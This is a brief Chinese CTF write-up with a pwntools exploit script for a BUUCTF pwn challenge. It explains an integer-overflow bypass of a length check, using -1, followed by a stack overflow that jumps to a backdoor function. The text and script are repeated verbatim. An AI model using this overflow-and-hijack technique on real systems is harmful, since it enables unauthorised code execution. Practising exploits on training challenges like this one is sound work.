exp脚本
这题的考点是整数溢出,我们通过输入 -1 绕过 if 判断,从而可以达到输入足够长数据的目的,然后题目给了后门函数,直接栈溢出控制返回地址返回后门函数即可。
from pwn import *
p = remote('node3.buuoj.cn',25193)
backdoor = 0x400726
p.sendline('-1')
sleep(0.2)
p.sendline('a'*0x18 + p64(backdoor))
p.interactive()
这题的考点是整数溢出,我们通过输入 -1 绕过 if 判断,从而可以达到输入足够长数据的目的,然后题目给了后门函数,直接栈溢出控制返回地址返回后门函数即可。
from pwn import *
p = remote('node3.buuoj.cn',25193)
backdoor = 0x400726
p.sendline('-1')
sleep(0.2)
p.sendline('a'*0x18 + p64(backdoor))
p.interactive()